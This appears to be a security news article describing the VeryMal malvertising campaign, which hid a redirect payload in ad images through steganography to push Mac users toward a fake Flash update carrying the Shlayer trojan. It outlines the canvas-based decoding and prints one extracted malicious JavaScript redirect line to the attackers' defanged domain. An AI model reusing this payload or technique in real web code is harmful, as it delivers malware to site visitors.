The ads were served by a group security firm Confiant has dubbed VeryMal, a name that comes from
veryield-malyst.com, one of the ad-serving domains the group uses. A run that was active from January 11 to January 13 on about 25 of the top 100 publisher sites triggered the image as many as 5 million times a day. In an attempt to bypass increasingly effective measures available to detect malicious ads, the images used steganography—the ancient practice of hiding code, messages, or other data inside images or text—to deliver its malicious payload to Mac-using visitors.
Security provider Malwarebytes assisted Confiant in the report by providing detailed analysis of the malware.
The image, which is displayed to the right of this text, looked unremarkable. Using some clever HTML5 programming under the hood, however, it delivered malicious code to unsuspecting Mac users. VeryMal created a canvas object, which developers use to render or enhance graphics. If the computer had Mac-specific fonts installed, the object would then loop through the underlying data in the image file and convert an individual pixel in each loop into an alphanumeric character. After adding each newly extracted character to a text string, it looked like this:
top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;
With that, the malvertisers had snuck the code they needed to redirect Mac users to a website that served display ads that falsely claimed the visitor’s Flash Player was out of date. Visitors who took the bait were then infected with Shlayer, a Mac trojan that came to light 11 months ago and is used to install adware.